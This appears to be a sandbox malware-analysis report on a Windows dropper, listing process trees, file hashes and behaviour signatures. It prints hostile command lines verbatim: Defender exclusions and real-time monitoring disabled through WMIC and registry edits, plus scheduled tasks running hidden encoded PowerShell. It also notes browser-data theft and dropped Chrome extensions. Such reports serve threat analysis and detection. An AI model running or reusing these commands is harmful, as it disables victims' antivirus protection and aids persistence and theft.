PID 2256 wrote to memory of 1724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2256 wrote to memory of 1724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2256 wrote to memory of 1724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1544 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe

.\Install.exe /riRVBdidLX "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe\" Fi /nTsite_idiTD 385118 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\taskeng.exe

taskeng.exe {6E385E4A-D8D7-4369-91D4-303231E68A34} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "guivFWLjr" /SC once /ST 02:18:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "guivFWLjr"

C:\Windows\system32\taskeng.exe

taskeng.exe {DB64E25A-720D-4AE0-9237-1EC01284555D} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "guivFWLjr"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqVzEotUY" /SC once /ST 05:55:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqVzEotUY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqVzEotUY"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ghvOphcQH" /SC once /ST 10:40:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ghvOphcQH"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "bjzvzwrptCEFdBfgJx"

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe

MD5 0a35bbd6448122353a2d8ea91cff5781
SHA1 742ec335853eba4e5b41200fa46958328e90cb2f
SHA256 ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA512 5c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f

memory/2036-15-0x0000000001F30000-0x00000000025E5000-memory.dmp

memory/2620-23-0x00000000000F0000-0x00000000007A5000-memory.dmp

memory/2620-24-0x0000000001130000-0x00000000017E5000-memory.dmp

memory/2620-25-0x0000000001130000-0x00000000017E5000-memory.dmp

memory/2620-26-0x0000000001130000-0x00000000017E5000-memory.dmp

memory/2620-27-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/2368-32-0x0000000073640000-0x0000000073BEB000-memory.dmp

memory/2368-33-0x0000000002850000-0x0000000002890000-memory.dmp

memory/2368-36-0x0000000073640000-0x0000000073BEB000-memory.dmp

memory/2620-37-0x00000000000F0000-0x00000000007A5000-memory.dmp

memory/2620-38-0x0000000001130000-0x00000000017E5000-memory.dmp

memory/1544-41-0x00000000012B0000-0x0000000001965000-memory.dmp

memory/1544-42-0x0000000010000000-0x0000000011E5C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SBPNCSW8ZEUXHX7HD8U6.temp

MD5 f7b92e0e114a027ae162589e196f8844
SHA1 7fadcb83884257a2026239cd17141a811eb50aed
SHA256 818e9d082dc23539aa3e4013f093907e01d87d04227269e318901a9a0a9088d0
SHA512 dee9843c71948618156772e54b8f146991e6431ed6becb7c61e0295e01daacec7dbcaa60177d651748b72fc589285aeb405598fe094c66e3b2605b1ab1ce8000

memory/2256-51-0x000000001B130000-0x000000001B412000-memory.dmp

memory/2256-53-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2256-52-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/2256-54-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2256-55-0x0000000002690000-0x0000000002698000-memory.dmp

memory/2256-56-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2256-57-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/1544-58-0x00000000012B0000-0x0000000001965000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1904-69-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/1904-68-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

memory/1904-70-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1904-71-0x0000000002560000-0x0000000002568000-memory.dmp

memory/1904-72-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

memory/1904-73-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1904-74-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1904-75-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1904-76-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

memory/2836-77-0x0000000073FD0000-0x000000007457B000-memory.dmp

memory/2836-78-0x0000000001110000-0x0000000001150000-memory.dmp

memory/2836-79-0x0000000073FD0000-0x000000007457B000-memory.dmp

memory/2836-80-0x0000000001110000-0x0000000001150000-memory.dmp

memory/2836-81-0x0000000073FD0000-0x000000007457B000-memory.dmp

C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf

MD5 44f92e47f7bbac6796287e09f4a58d27
SHA1 036350d24e0b64a0977c22d3367f79c18d86eeed
SHA256 d43581eea4cac88f4cfc4e5a1634f96984e5cb9e43c7e9fbc56a96b5caa3eb84
SHA512 558b66bbcaaa71e444654bd5d26c51854d5b4c3d6ee937b64db9b72d80754e2d75194f67ffd213a28be5602a816f2fb4ae620547e8af7b0601e36e83659e2ebf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8b144f11a703b9e766160e3bafbbc607
SHA1 dc876639ea0ef392d2fab5eb37b479b3fdaee69b
SHA256 6d3fd8c7abc601a51dd7388bc9ce08a537ee1a3ded2cb7bf2e8629411243c257
SHA512 5eb369ab05061f60a451761682a9019b1c2679d301644eca117a0c7a6ed8a6885ebb5c56b9eb58a478b076b1c0da8b48ff891a31f6f3d4102d7e19b5a8f2e31e

memory/2912-92-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2912-93-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2912-94-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2912-95-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2912-96-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2912-97-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2912-98-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2204-100-0x00000000012B0000-0x0000000001965000-memory.dmp

memory/2204-101-0x0000000010000000-0x0000000011E5C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 23:43

Reported

2024-04-07 23:46

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
